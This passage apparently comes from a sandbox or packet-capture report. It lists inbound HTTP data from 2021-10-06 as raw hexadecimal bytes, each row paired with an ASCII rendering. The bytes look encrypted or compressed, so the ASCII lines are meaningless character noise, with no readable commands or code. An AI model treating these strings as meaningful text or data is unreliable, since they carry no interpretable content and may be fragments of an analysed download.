b7 47 c7 60 fc 2d c6 09 65 f5 d5 ad 43 bd 5e 7e 4b d3 84 f9 d7 6b bd b1 1e d5 43 86 99 41 be c1 64 c6 0f 96 fa 5c a8 97 a0 05 9c 3d 99 4d 37 7c a6 a6 dc 35 b6 ba e0 7b 50 12 43 06 78 51 75 aa 7a 1b 41 0c 2f f0 9f 83 88 b5 f4
                                                          Data Ascii: *2~}Oo<a0&fw5_F8DU1opa Rt(oR)r^?dRhe#M0JHiU>A$r,y<jR&4(RXRS2=N~s*B1i#G`-eC^~KkCAd\=M7|5{PCxQuzA/
                                                          2021-10-06 16:03:54 UTC176INData Raw: 50 dd 1f 1b 9e fe 71 95 86 5d 8f 0e 11 42 ae e2 d2 d6 13 9b cf a7 bf 5e ef 36 ae 59 bd 04 fc f4 98 8f 6b eb 0c 3f a0 6d 65 74 b3 3f cc 9e 3e c0 be 2e 98 9a a1 a5 6b 4a 2b 10 95 2e 6f e1 b1 2d 63 2f 57 ed e9 8b 2f 71 66 a7 fb a5 b7 e5 ff e6 d8 72 84 27 4e 98 ac 76 65 df fd fd 25 8f ec 63 24 fa c5 61 00 10 77 61 ef 2c bd 1f 17 ea 17 83 97 59 43 d5 98 59 38 2c a5 69 a2 ba 7b 65 e9 5d 87 9f 67 34 1f 56 29 16 f0 13 02 83 cc b5 94 dd 0d 70 ab 54 c3 43 f1 99 39 9c 39 af c6 d0 6f 19 aa 57 55 16 fa b1 9b b7 07 0e 2e c7 dd ff cf 64 f3 cf f4 69 65 5b 5f e1 38 da ec d7 e7 eb 89 82 ec b2 1b 41 89 c1 e3 83 c0 db 40 3a 32 96 2e ab a6 0a c0 c1 50 5e 7f 8c b3 fa 30 99 6b 95 35 16 38 92 62 fc 3f 29 51 5f 30 4b d6 92 6c 81 0a b1 e4 d5 20 dd bf 79 7c 39 dd a7 b6 47 3b 29 59
                                                          Data Ascii: Pq]B^6Yk?met?>.kJ+.o-c/W/qfr'Nve%c$awa,YCY8,i{e]g4V)pTC99oWU.die[_8A@:2.P^0k58b?)Q_0Kl y|9G;)Y
                                                          2021-10-06 16:03:54 UTC177INData Raw: c8 bb 6f f9 44 bf b6 69 b3 92 dd 90 e7 54 e1 cf 68 02 73 82 b4 af cf 14 f0 ed c1 1b f9 f1 f5 de c6 7c 2c 21 31 14 aa 14 06 f2 be 57 06 3e 93 0c fc 90 c6 a7 5b 0f fa 51 86 96 07 2c 6f 9e 6a 8b ec ca b7 17 58 3b e7 e6 d6 ff 44 18 97 39 53 3a 91 5b 18 4c 0e 50 58 0d f0 15 4e 1e be 21 85 2e b2 7e 12 b6 c0 4e c3 40 cb e2 52 c8 55 c6 da 10 e8 f5 69 23 b6 88 ad e8 02 0d 1f 81 bd c6 06 67 f5 d5 cb d6 cb ad 6f ad ac f9 25 34 65 bf b1 1e d3 cd bc 18 95 58 be 19 72 16 99 f8 5c a8 91 2e 3f b4 2d 7f 32 4a 7c 00 a8 de 35 b6 b9 7e 32 55 4d a4 79 05 65 f2 a4 78 1b 41 0f b1 a6 f4 40 6e ca 89 4d a0 2c 0d 8f 30 96 df 10 42 72 ed 35 98 29 84 83 36 dc 35 f7 32 2a c9 4d 3f 74 54 28 e1 11 21 ac c7 64 1d de f2 92 ef 4c 50 a1 61 5b 63 29 bf 2d af f8 94 9b 8c 58 e6 cd 6d 40 2d 22
                                                          Data Ascii: oDiThs|,!1W>[Q,ojX;D9S:[LPXN!.~N@RUi#go%4eXr\.?-2J|5~2UMyexA@nM,0Br5)652*M?tT(!dLPa[c)-Xm@-"
                                                          2021-10-06 16:03:54 UTC178INData Raw: e1 b1 bb f5 a2 88 0e 0d f4 52 e1 79 bf f9 a5 b7 73 69 a3 e3 a5 60 58 33 33 91 6e 67 df fd 6b b3 38 f8 83 c0 85 b8 a6 5c 08 75 61 ef ba 2b 70 92 3d f3 fc ea ba c0 cd 9a 59 38 ba 33 68 e7 5a 9f 1a 94 a3 25 87 65 34 1f c0 bf a0 a0 c7 e6 fc b1 af 53 c5 0f 70 ab c2 55 68 9e 79 dd e3 44 99 27 c8 6d 19 aa c1 c3 94 04 63 7f c8 7a 5c 2d de df ff cf f2 65 9a 91 8e 81 24 22 8c 14 c3 ee d7 e7 7d 1f c3 32 52 ff 3e f4 48 ae 9a c2 db 40 ac a4 1f 9e 4c 42 75 bd 64 3e 47 7d 8c b3 6c a6 96 72 74 d1 69 45 53 ed e5 3d 29 51 c9 a6 f8 34 75 88 fe 77 6d 4d cc 22 dd bf ef ea 15 93 46 52 38 46 de 92 f7 f0 53 6f 29 bb 09 aa 9a 1e 9a 0b 09 72 74 a8 04 03 b5 ad 4a 8a 3b 6d 0c 52 58 1b 3b 97 2d ad 5d 9c 8a c9 33 17 31 9b 5e 77 04 fb 5f b9 89 94 ea a1 27 ba 15 ae 6d 1d c5 cc d3 de f0
                                                          Data Ascii: Rysi`X33ngk8\ua+p=Y83hZ%e4SpUhyD'mcz\-e$"}2R>H@LBud>G}lrtiES=)Q4uwmM"FR8FSo)rtJ;mRX;-]31^w_'m
                                                          2021-10-06 16:03:54 UTC180INData Raw: 08 fc a5 b4 0d 53 68 25 4b b3 c2 d4 ff 44 8e 01 b5 a9 d8 75 24 65 de 7c 74 5a 0d f0 83 d8 05 ce e6 61 51 cf ca 82 92 c2 4e c3 d6 5d 5b 72 2b b1 b9 a7 c6 59 d1 6b 23 b6 1e 3b 92 8c ce fb fe c0 3e e9 43 f7 d5 cb 40 5d 4e 3e 4e 48 86 58 2e 68 9a b3 1e d3 5b 2a bc 54 95 5a 66 0f 2d b2 dd 5e a8 91 b8 a9 b9 53 9c d6 35 01 5c e1 fb 37 b6 b9 e8 a4 5d 80 72 9d 7a 18 8f c3 5d 19 41 0f 27 30 92 e4 8d 2e f6 30 3e a9 28 8d 30 96 49 86 49 60 3a d1 e7 54 44 20 13 de 35 f7 a4 bc 59 91 dc 90 2b 55 00 d0 04 ae c7 64 8b 48 ba aa 38 a8 2f dc 62 bb 46 2b bf 2d 39 6e 2e 82 6c bc 99 b0 48 42 07 20 c4 3d 3f af db 0e 12 23 4d f4 89 6c cd ce 83 6d 02 9f 3e 80 26 5b d8 73 f0 d1 af d6 ff e2 60 27 52 27 73 7f 2f d3 3d 16 63 aa 80 48 9f 7e 1b 94 0e ec 55 db 64 d3 e4 e2 48 c5 92 85 65
                                                          Data Ascii: Sh%KDu$e|tZaQN][r+Yk#;>C@]N>NHX.h[*TZf-^S5\7]rz]A'0.0>(0II`:TD 5Y+UdH8/bF+-9n.lHB =?#Mlm>&[s`'R's/=cH~UdHe
                                                          2021-10-06 16:03:54 UTC181INData Raw: a6 89 7a fe eb de 84 0d 55 36 1f c0 29 36 e8 16 17 18 ce d2 90 6e 3f 72 ab c2 c3 fe f5 60 3f 07 3b e4 c2 00 5d 1b aa c1 55 02 e0 b3 80 2c 05 21 2a 36 ef fd cf f2 f3 0c f0 c6 63 c0 5d f1 3c cc df d5 e7 7d 89 55 f7 4b 02 da 8b 35 e7 b4 f3 d9 40 ac 32 89 2a 3e a0 91 c2 19 54 0b 4c 8e b3 6c 30 00 4b 81 28 8d 3a 2e 66 86 0c 2b 51 c9 30 6e d2 d3 6a 1a 08 10 e0 4e 13 df bf ef 7c 83 fc 5d 95 dc 39 a3 5d 57 c1 51 6f 29 2d 9f f2 49 fc 7e 74 74 82 b2 99 06 03 b5 3b dc bb 60 aa e8 2d 25 09 d9 a6 2f ad 5d 0a 1c 46 ca f5 d5 e4 23 43 07 cd 5d b9 89 02 7c e3 50 7d f1 d1 10 4b 98 fa d1 de f0 5a f9 76 5b 6e a3 b4 77 e6 d6 a4 da 24 e7 9b 6f 81 fa 60 61 a3 d4 7a 3e 5b 41 86 e3 49 c7 14 2f a4 b7 61 bd 35 48 8d 52 9b 52 da 73 69 27 b3 45 17 6f 9e 99 62 2c 1c c0 30 1f c8 03 4d
                                                          Data Ascii: zU6)6n?r`?;]U,!*6c]<}UK5@2*>TLl0K(:.f+Q0njN|]9]WQo)-I~tt;`-%/]F#C]|P}KZv[nw$o`az>[AI/a5HRRsi'Eob,0M
                                                          2021-10-06 16:03:54 UTC182INData Raw: 09 1a bf 43 08 d9 cb d7 cb 40 cb d8 6d 9c ac 62 27 53 6a 60 8f 1c d3 5b bc 2a 81 26 a8 82 70 50 96 04 62 aa 91 b8 3f 2f 2e 98 33 d1 7e 21 a7 fc 0a b4 b9 e8 32 cb 5b be 6e 9e 67 f2 ab 38 24 43 0f 27 a6 04 43 a3 cb 12 4f 43 23 6b b0 32 96 49 10 df 65 f4 21 03 2b 39 8c b1 e3 37 f7 a4 2a cf 4e 5d 75 cf 2a 7d 1e 85 93 c5 64 8b de 2c 85 35 59 cb a3 1f 4b a6 16 bd 2d 39 f8 b8 98 c4 59 7d cf 35 50 c6 1d c6 3d 3f 39 4d 9b 45 d2 a9 8b f4 5f ef 8c 81 6d 02 09 a8 c4 f8 be 3c 0c 8d 85 ab 94 fd e2 60 b1 c4 6c a7 8e cb ac 40 63 05 e8 82 48 9f e8 8d fa 2a 0e b1 a4 19 45 a3 a0 4a c5 92 13 f3 65 87 1c b5 49 85 ce 34 b7 e6 3f 53 c7 d8 2a df 96 14 d8 71 89 a6 7e 79 61 7f 14 ef 56 5d d1 5e ec 39 8b 2d 6a 01 e0 1b 8f a9 a1 cc df 95 fc 49 24 72 13 28 fd 80 b2 af 29 96 3c 96 f9
                                                          Data Ascii: C@mb'Sj`[*&pPb?/.3~!2[ng8$C'COC#k2Ie!+97*N]u*}d,5YK-9Y}5P=?9ME_m<`l@cH*EJeI4?S*q~yaV]^9-jI$r()<
                                                          2021-10-06 16:03:54 UTC183INData Raw: 8e 41 d8 1e 9d e5 7d 89 c3 61 54 a0 3a 6f 4a 9a 81 d3 90 42 ac 32 1f bc 4d 0c 76 26 66 29 5c 4a c7 b1 6c 30 96 dd 73 1a 6c de 51 1b fe 69 62 53 c9 30 f8 44 74 b4 fd ec 6f 9d d7 58 96 bd ef 7c 15 6a 41 d7 3d dd dc 20 ec 68 18 6d 29 2d 09 64 98 ff 9a 90 0b ff 6f 16 4f 01 b5 3b 4a 2d 33 6f 09 c9 5a 74 27 4b 66 af 5d 0a 8a d0 31 72 31 00 5c 3e 18 f9 13 bb 89 02 ea 75 2d 4e 1d 35 6f 36 d9 ec 9f dc f0 5a 6f e0 77 db 47 50 08 9b b5 d4 94 26 e7 9b f9 17 67 16 93 47 ab 07 ba 09 0f 84 e3 49 51 82 79 7b 53 85 c2 48 ee 3e 1c 99 52 da e5 ff ff 03 b7 f3 10 e3 5e fe 62 1e c0 30 89 5e 83 4c b0 d8 f0 9e fa 8d 33 a6 07 cc 23 71 15 03 25 f9 ba 5c c5 0f 72 05 f7 32 1e 35 68 53 ac 0e b1 83 92 41 56 de 60 9e 30 0a 37 15 09 81 4f 20 ef d0 20 bc fe 97 46 46 df bf 47 a3 71 44 e5
                                                          Data Ascii: A}aT:oJB2Mv&f)\Jl0slQibS0DtoX|jA= hm)-doO;J-3oZt'Kf]1r1\>u-N5o6ZowGP&gGIQy{SH>R^b0^L3#q%\r25hSAV`07O FFGqD
                                                          2021-10-06 16:03:54 UTC185INData Raw: 7a 04 16 0d 27 a6 92 d5 88 1e f1 ab 3c 5e 0f cf 67 94 49 10 49 f3 0b 11 d4 cf 46 f1 34 be 62 f5 a4 2a 59 d8 d9 76 2f ce 02 63 23 2f 90 66 8b de ba 13 09 1e 1c 47 60 36 61 8c e8 2f 39 f8 2e 0e 6a 61 9d 2b 4a 2d 2f e5 93 3f 3f 39 db 0d 23 fe 7d 6f 8b 22 e5 24 d4 6f 02 09 3e 52 20 d8 dc e8 f2 f8 87 dd a7 e0 60 b1 52 fa 41 a4 1e 48 3f 1e 4b 82 d8 4a 9f e8 1b 6c 08 85 51 40 66 38 cc ac 10 c7 92 13 65 f3 60 0d 66 ad fa b3 a5 99 bc 3d 53 c7 4e bc 93 ca f3 3c 0e f4 15 ae 23 63 7f 14 79 c0 7f 76 be 08 46 f6 f9 98 5b e2 1b 8f 3f 37 ba 70 72 18 36 59 87 87 72 ff 80 b2 39 bf 63 13 77 1d 6f e2 99 1b 09 c4 30 5f fd 49 3c 69 f8 d1 8d d4 3b 48 82 1e 19 9e fe e7 03 e0 50 6a ea 6e 3f 94 99 d3 d4 13 9b 59 31 b5 59 1f d2 d1 24 e1 63 fd f6 98 8f fd 7d eb 5b 45 89 1a 09 cd 3f
                                                          Data Ascii: z'<^gIIF4b*Yv/c#/fG`6a/9.ja+J-/??9#}o"$o>R `RAH?KJlQ@f8e`f=SN<#cyvF[?7pr6Yr9cwo0_I<i;HPjn?Y1Y$c}[E?
                                                          2021-10-06 16:03:54 UTC186INData Raw: bf ee 7c 95 ef 41 b4 3b 3b 2a 7d ec f2 51 6f e4 1d 09 f2 99 f8 1e 56 09 82 6d aa b8 33 b5 3b 4b bb b3 98 0e 2f 59 09 a7 86 2d ad 5c 0a 0a 55 31 f1 32 e6 de 50 18 f9 5e b9 09 11 ea e3 2c 5c 97 c0 6d 4b d8 ce 53 cd f0 5a 6e 76 f7 78 45 b6 0b e6 35 83 d8 24 e6 9b 79 92 67 45 86 a1 29 69 ba 6f 42 86 63 5a 51 14 78 a1 d7 43 c0 35 ec b9 ec ab 52 da e4 69 0b b8 a3 15 10 9e 93 66 2e 1c c1 30 09 db 83 48 b2 3e 72 f0 fa 47 7e a4 87 df 23 e7 14 fc b0 0c b8 21 c4 e3 be 14 f7 32 1f a3 e8 6e af e8 b2 fe 12 5c 1b dc 61 9e b0 8f 37 17 1f 67 cd 4e ef e0 6c be 7e 84 46 d0 de 38 c4 56 73 39 e4 55 b1 06 0e 97 e4 ce f9 63 7d 27 84 59 89 b4 a4 6c c4 b9 ef ea 44 29 b7 5f 34 67 de ed e6 be ec cd 69 02 71 14 b4 4c cf f2 f6 90 c1 17 f5 f3 f0 de c6 ea 2d 4d 37 f2 a8 69 07 df b2 55
                                                          Data Ascii: |A;;*}QoVm3;K/Y-\U12P^,\mKSZnvxE5$ygE)ioBcZQxC5Rif.0H>rG~#!2n\a7gNl~F8Vs9Uc}'YlD)_4giqL-M7iU
                                                          2021-10-06 16:03:54 UTC187INData Raw: e3 77 9d 03 58 a1 e8 5b 50 ee 20 42 2e 59 3c b2 99 4b db 3c 8c 58 5d bc d8 03 68 fb 09 d9 ea ac b8 9b 0c 65 8c b5 d0 26 e0 71 95 ce 69 e8 99 40 9a 2d 61 92 aa 72 65 3c ed 32 fb 68 3a 8c a4 85 47 f4 f5 93 c7 7b 11 51 64 c8 00 ba 49 16 e9 0b f2 cd 3e 3f f7 a6 29 62 90 ec fa b3 8c 04 3f 15 4d ba 11 18 57 ee df 73 eb ed 8b 06 02 da e5 c2 8f 7d b2 7a db 1a ff c6 09 01 53 23 fe ba 97 1f 29 62 20 07 d3 fc 9c 98 ee ca cf f0 5f ec dc 21 99 08 32 ee a8 fe 45 d9 1a 18 9d 51 67 70 83 56 8f af 09 9c ad d1 d2 9a 0a 9c c9 20 bc 72 cb c9 aa 8d bc e6 ef 16 9b 26 6a 0b 1c 4f a3 9a 66 9a 9f a3 ca fd 3f 2d 9d ee 9e d6 b6 d4 73 52 2d 45 95 16 4a f2 b1 aa 62 6f 77 67 ed ba 2f 3c 4b 8b fa e1 b7 fd e5 d8 c9 85 85 7f 63 b2 a9 65 64 e0 d1 ae 20 29 ee 52 0a 42 c0 b7 02 66 5d eb e9
                                                          Data Ascii: wX[P B.Y<K<X]he&qi@-are<2h:G{QdI>?)b?MWs}zS#)b _!2EQgpV r&jOf?-sR-EJbowg/<Kced )RBf]
                                                          2021-10-06 16:03:54 UTC189INData Raw: 2d 6d 13 41 4c 58 d9 5f d2 c6 e5 4a 64 6f 72 88 4b 6b 04 ff b0 2a cb f9 e9 8a fc bb 42 56 87 80 ac 40 9f 7c 43 97 e6 4e 5d fb 77 b0 54 dd cb 0b e7 90 55 73 47 f4 e4 40 fa fd b9 2b 1b b7 5b 26 34 22 c9 d1 8a e9 b7 87 bd 2f f7 2a fd ba 71 45 04 c2 02 d5 17 c5 30 a8 b7 1e c4 32 3c eb f8 47 11 42 6b a4 82 32 bb 0f 92 00 3c 56 6f 4f 32 f1 35 86 11 86 4e ca ef ce 6c 5f fd ba 72 1f d1 01 44 71 67 2a e5 04 34 2f 2b 84 e5 d7 78 be 6d c7 8a 68 08 73 a8 8a c7 35 6f 44 6f 2e a6 c3 b4 56 fa f6 f7 1a ec 79 46 92 73 b0 b4 07 fe d7 f6 a1 c0 f6 fa 28 f7 f7 c7 49 1f a5 35 93 aa 53 23 1f b0 34 04 cc b5 ed ec b4 c1 63 7c e1 fd 76 8d 57 2e 52 7f 71 6f 2b fe a8 a5 e3 5d 73 fa ad d7 e6 45 74 b1 3e 41 c5 92 8c 36 d1 03 73 59 17 fd ca 4f 6c b7 f9 b5 9c a2 eb 1d 2b ee 94 d3 7f cb
                                                          Data Ascii: -mALX_JdorKk*BV@|CN]wTUsG@+[&4"/*qE02<GBk2<VoO25Nl_rDqg*4/+xmhs5oDo.VyFs(I5S#4c|vW.Rqo+]sEt>A6sYOl+
                                                          2021-10-06 16:03:54 UTC190INData Raw: 50 9c 41 93 d3 e1 4f 70 9c c8 7a 64 67 1d 7f ab e7 cf a2 cd c1 a7 50 c6 49 bb a0 72 ed 4b 0d 36 15 d2 64 60 78 2e 5c 25 7a cb bf 0a 4b 78 e6 2b 04 d4 13 6f 20 30 bb 4c 73 03 2b 2d 80 d5 18 f9 a0 5b 3b ea 69 8b 75 9a 6c 22 8c f8 71 57 31 b6 fd c5 1c d5 f8 a6 9a ec 1b f9 db e2 06 16 e9 e0 07 75 4d 57 ea f2 3e 26 d6 15 d7 f2 9a d2 39 67 58 f8 d7 a2 05 66 25 ee f1 a2 aa d9 5d 1d 5b 85 87 55 0b aa 61 f5 b9 fa e0 8f bf a2 b7 a5 43 50 30 11 41 56 2c be e3 b1 a3 6d 83 85 09 18 e1 b2 e8 24 a2 c1 80 a4 73 46 a0 a8 bc 2e 7b f7 30 d8 5c f4 dc 44 68 ef 0c 5a a4 9f 84 7e ae bd 33 ce 65 75 89 4d 51 49 0b 2f db 62 9b 81 d4 f6 50 c5 9b 64 6b 6d 72 7d 3a a0 a4 cc b2 49 35 fe c2 13 85 28 f5 c1 fd 4b b4 08 dc 4c 75 91 e7 32 6a 34 7c 37 ce 33 bb 03 d1 6d 36 89 e3 94 97 12 7b
                                                          Data Ascii: PAOpzdgPIrK6d`x.\%zKx+o 0Ls+-[;iul"qW1uMW>&9gXf%][UaCP0AV,m$sF.{0\DhZ~3euMQI/bPdkmr}:I5(KLu2j4|73m6{
                                                          2021-10-06 16:03:54 UTC191INData Raw: 9f f7 59 26 1c 55 31 b5 ca 8d 48 2b 3f ae f2 f2 47 e6 a5 3b ce 2b e7 88 fd 0c 1d b6 21 04 e2 d4 25 e5 32 db a2 54 7f bd e8 7a ff ae 4d 19 dc ad 9f 4b 96 35 17 cf 66 36 57 fd e0 b8 bf c2 95 54 d0 06 39 78 47 61 39 38 54 0d 17 1c 97 04 cf 45 72 73 27 6c 58 09 a7 aa 6c 28 b8 98 d0 46 29 47 5e e6 76 d7 ed d7 bc d0 cf 60 02 47 16 f1 4c c6 f2 ca 92 3e 1e ff f3 c9 dc 3d e0 24 4d 72 f0 94 6b 0e df f8 57 43 3e 9b 9a ac c7 f8 43 51 72 ae 1d cd 94 0f 2c 37 0a 95 ac ec 2c e9 68 a3 41 e1 e4 b6 fd 02 8c 9f b5 39 de 6c 2f 10 de 6c 50 1e 0f f8 83 3e 07 f5 c5 8f 53 c6 c8 b8 bb c8 4e bb d4 99 45 58 2e 2b b9 8d d8 ee f7 e9 21 ea 00 a5 92 92 e9 7c e2 b5 3e 84 67 c9 d7 c3 40 5b 4c 28 4b a6 84 b1 2c 95 b4 b9 1e 6b 59 f9 bc 89 be 00 66 8d 24 9e fa 9c aa 6a b2 37 b9 ea 9b 0a 28
                                                          Data Ascii: Y&U1H+?G;+!%2TzMK5f6WT9xGa98TErs'lXl(F)G^v`GL>=$MrkWC>CQr,7,hA9l/lP>SNEX.+!|>g@[L(K,kYf$j7(
                                                          2021-10-06 16:03:54 UTC192INData Raw: 5e f5 f0 6e bf 28 27 52 2d 35 f5 fe 91 02 e3 f4 c8 c6 51 98 d0 bf bb 2f 38 63 a6 14 40 e3 0c 4a 8e 9a 61 92 96 f6 9c 13 03 1d bf fe c0 0a 02 78 de ca ae 49 eb 5f be 9c af ef ed 04 8a ae 78 28 1f c4 b0 57 74 02 a7 21 db 8b 2b f6 ab db 8d 32 a3 bb 7c 36 3d 7a 80 76 79 73 a7 24 75 08 42 c6 fd 00 39 f6 72 89 ec fd a0 fe e8 74 d8 6b 91 69 56 74 b7 2d 7d a2 e5 f5 3d 8c f7 3a 3e 7e dd a5 1a 21 6e 3b f6 d0 a4 05 19 71 0c 3e 8e 9a 5a 91 82 29 22 c1 bf f7 bc 94 63 ca f3 a1 9f 8e 7c 11 04 46 32 05 f3 4b 1b 1d d7 b2 8c ea 11 11 b7 b4 df c9 e9 b3 27 3f 25 b8 df 95 72 75 b7 46 48 08 fd fd 84 22 1a 47 34 e4 c3 94 d1 69 ed 38 ee 31 79 ed 41 51 22 ce f3 fb f8 f0 96 5a e8 e6 06 fc 96 69 c7 ce e0 bf 60 de 12 62 0a ca 84 80 e0 43 75 64 5e dc 92 0e 11 37 6a dd 16 ae 19 8a 47
                                                          Data Ascii: ^n('R-5Q/8c@JaxI_x(Wt!+2|6=zvys$uB9rtkiVt-}=:>~!n;q>Z)"c|F2K'?%ruFH"G4i81yAQ"Zi`bCud^7jG
                                                          2021-10-06 16:03:54 UTC194INData Raw: fe 95 46 b6 de 6f 44 44 73 5e e4 02 31 17 0e ff e4 97 79 71 7d 4e 84 00 09 a5 a4 19 c4 e2 6f f8 44 5f b7 04 b4 76 df 9a e6 e3 ec cc 68 7a 72 49 b4 4e ce 8b f3 cf c1 16 f7 89 f4 81 c6 e8 2c 36 37 93 a8 68 06 a3 b1 34 06 3c 93 e7 fd a6 c4 40 59 0c fb 7c 88 96 07 53 6e 6d 6a a4 e4 ac b4 0f 58 49 e9 75 d7 98 44 8c 97 2a 50 b5 93 27 18 7e 01 3b 58 0f f0 20 4f 6e b4 c6 87 f7 b3 a1 1c b6 c0 eb c2 bb cb 5a 50 88 56 d6 da c4 e6 18 68 4c b6 1f ad 62 17 84 1d fe bd cf 09 14 f5 d4 cb b2 ca 3f 6d 49 ae 7c 24 5d
                                                          Data Ascii: FoDDs^1yq}NoD_vhzrIN,67h4<@Y|SnmjXIuD*P'~;X OnZPVhLb?mI|$]
                                                          2021-10-06 16:03:54 UTC194INData Raw: 6a bc b1 e7 d2 28 bc be 81 44 bd 11 72 2c 96 01 5d dd 91 ba 3f 45 2f ee 30 36 7c a1 a6 ab 35 b4 b9 16 33 24 5b 43 7b 87 64 f6 ab 78 1b 62 0d 5c a6 93 43 ac ca 8f 4d 3c 23 2a 8d 4d 96 48 10 6f 67 76 37 e7 29 63 8e 4b dc 34 f7 8c 28 26 4e db 76 00 2a 81 1e 22 ac ed 66 0a de a0 85 51 4c 66 a5 79 4b ef 2b f4 29 08 f8 10 9b df 5e aa cd 08 53 98 26 f5 3d 7d 3a 62 9f 12 c5 0b 8a 32 5b d1 cc f7 6e 3e 0a 07 c4 58 be 75 0e bd 85 c7 d0 50 e2 39 b1 30 75 33 99 a3 b7 b9 7a 26 b1 fa 51 cf e8 4c e3 62 0a 26 a6 1c 45 b3 e0 1b c4 7d 12 93 64 3d 03 20 4d b2 c9 ff f0 85 38 3c c0 fe 2d 42 95 d8 d2 3d 83 50 35 68 71 58 04 00 44 31 d9 26 fa ec 9f 4f 3e c7 f4 c9 9b e3 b5 48 cf 7b eb 5b 3f fa 48 a6 e3 90 92 02 09 23 03 4b d8 6a bb 09 c8 fb ee 81 77 28 f7 27 9d 52 1e bf 82 58 7c
                                                          Data Ascii: j(Dr,]?E/06|53$[C{dxb\CM<#*MHogv7)cK4(&Nv*"fQLfyK+)^S&=}:b2[n>XuP90u3z&QLb&E}d= M8<-B=P5hqXD1&O>H{[?H#Kjw('RX|
                                                          2021-10-06 16:03:54 UTC195INData Raw: a8 2f ca 46 31 7d 24 ca 44 f2 64 21 2f 1a fe 80 5e 30 c4 2e 12 53 3e 71 3d 12 cd 0d 29 05 a6 65 b1 bc 00 5d ce 0a 3f 85 b6 44 94 d1 9b 4f 27 fc 15 db 73 55 aa 6e de f2 18 0a 50 7b 68 9e ed 9d c8 17 60 f0 0f 98 04 47 dc 58 3e d2 5c e5 6f 5d 21 69 15 95 74 cd 6e 0a de 29 64 b8 5d 92 68 77 18 ab 3a d8 ed 4b 84 97 1b 68 17 87 02 02 b7 ba e5 ea f0 17 2b 43 77 39 20 d7 6e b3 fc fe ac 15 d1 9b ad ee 32 0c e9 d5 98 4c ba 3d 26 e7 87 00 3f 60 48 97 51 37 af 7c 80 cd 61 ad 52 92 a8 28 bc cb eb 54 20 ab 68 56 1b 24 85 73 cd 8b c5 71 9e 07 c5 a6 cf 6a 4b 91 41 8e 0e a6 24 cf 06 32 fe 16 f1 d4 08 30 b1 0b 58 91 2a 4b af 8f d6 8a cd 1a 4f 9a 58 9e 0c d1 58 73 6b 0b 28 63 ef a2 2c be bd d6 46 94 9e 38 01 04 73 7f a4 55 76 54 0e df a4 ce 18 31 7d 45 c4 59 6a e6 a4 08 84
                                                          Data Ascii: /F1}$Dd!/^0.S>q=)e]?DO'sUnP{h`GX>\o]!itn)d]hw:Kh+Cw9 n2L=&?`HQ7|aR(T hV$sqjKA$20X*KOXXsk(c,F8sUvT1}EYj
                                                          2021-10-06 16:03:54 UTC196INData Raw: 49 55 1c 65 4d 62 e5 6e 11 8c 7c 89 35 96 f1 2a 3b 1b d9 15 7c 28 64 4b 23 c9 92 64 ed 8b ba e2 5c 4e 6f f7 62 08 37 29 fb 7b 39 bd 78 98 2c 0c 9b 8a 1e 50 67 74 c4 5a 5a 4d 84 d2 75 c5 3c ec fd 00 ac 9a 83 0c 54 09 5c 92 20 de 8c 0e 94 d3 87 b1 a9 e2 06 e7 52 0b 17 99 6f f9 3d 20 1c a8 c4 1f 9f ad 4c fa 4e 5d 57 e1 33 45 84 b7 48 a4 c5 13 07 32 60 66 04 4b 9c 99 a5 92 b3 3f 35 90 4e 4d c4 92 b1 b2 7e de 15 73 14 17 1a 52 10 3a 1a 8f c0 b9 44 c9 a1 2a 40 b8 1b cb 67 a1 ff 83 73 b8 6c 24 c0 0b 2a b5 d8 b2 58 71 63 41 28 fb 0e c7 99 89 09 c6 55 07 fd b9 64 b4 9e 6f 8f eb 62 50 98 45 19 da a7 71 46 df 57 ca b1 13 78 f7 c0 99 8d 13 fa 96 31 dd 02 f9 b3 f5 24 d9 63 ff 93 c1 8f 0d 24 0c 3b fa 8b 25 53 b3 25 95 9c 7a 9a be fd c2 92 f0 19 69 70 71 64 de 76 6f 80
                                                          Data Ascii: IUeMbn|5*;|(dK#d\Nob7){9x,PgtZZMu<T\ Ro= LN]W3EH2`fK?5NM~sR:D*@gsl$*XqcA(UdobPEqFWx1$c$;%S%zipqdvo
                                                          2021-10-06 16:03:54 UTC198INData Raw: 82 ea 9d eb 05 60 ed 01 e7 6b 67 d0 3b 09 d2 43 e3 6b 5d 15 66 43 f0 2d f5 30 66 c4 29 55 94 33 81 3b 37 47 ac 31 d0 ea 6d 8e 86 2d 3b 72 a7 32 09 b0 a9 96 b0 94 33 0e 18 22 05 2c d5 65 82 d0 90 91 57 b3 fe 81 f5 32 2b ee c2 c6 1e df 6f 15 e7 96 25 25 52 0b c4 34 63 a7 50 9a e6 25 e8 37 89 80 19 9e ea c2 61 77 d8 31 3a 4a 79 b2 64 fb ad e6 48 c0 5b 86 bc 8f 34 1a f7 62 bc 42 95 74 88 55 59 d7 4d a1 86 4c 53 85 57 7b a3 0e 18 af ae c1 91 ff 06 76 bd 07 fb 30 cf 52 79 7a 2a 28 2e 9c 81 0a db fe da 27 b9 b3 75 21 36 00 58 82 30 31 54 6a f3 b7 af 17 17 18 27 c6 2b 6c c3 c1 02 b1 d0 0e 95 07 48 d5 37 d1 74 9a 83 83 f7 82 bb 07 69 16 14 f6 29 a9 9b 9c d9 af 61 98 98 90 de 81 8f 58 08 58 84 c1 1b 69 b1 dd 30 68 4a c5 fb 8e ac a5 23 35 17 fa 56 cd fa 72 41 0a 7a
                                                          Data Ascii: `kg;Ck]fC-0f)U3;7G1m-;r23",eW2+o%%R4cP%7aw1:JydH[4bBtUYMLSW{v0Ryz*(.'u!6X01Tj'+lH7ti)aXXi0hJ#5VrAz
                                                          2021-10-06 16:03:54 UTC199INData Raw: b1 2e fb dd 26 95 a9 83 2a 67 7d 6a bd 50 d8 da 5d 9f e6 ec b1 8b b6 19 c1 37 6c 32 fc 59 f1 7e 0c 25 dc e5 26 eb bc 62 8a 6d 0a 11 cf 08 20 9f 88 29 b7 f7 13 26 0a 0d 75 32 39 9d ce f5 83 96 6b 3c 94 3a 58 e6 f1 86 af 7e ec 15 59 1e 15 20 5d 17 20 1e b8 d1 8f 2a ff ba 5f 6f 94 6e fd 5a a1 dd be 07 a1 77 51 f5 21 4f 93 f4 f1 4c 45 17 56 02 9e 6d dc f8 9d 25 b3 42 3a fd 9e 4c c4 95 5e ec c8 4f 39 b4 72 5b ff 8d 14 03 c8 36 e1 8d 5c 5d c4 a5 b2 a0 50 f4 a3 5d da 38 8d b9 c3 4a ff 5b 8c 93 98 c7 1f 09 7c 0b c6 e9 35 6c c0 16 a0 f2 4d a5 be ff fd e6 e4 26 1a 47 44 0a e5 49 6f a2 dd d4 10 c7 54 4f 82 85 5f 8e 16 c0 fb f1 c5 0a af c2 bd e7 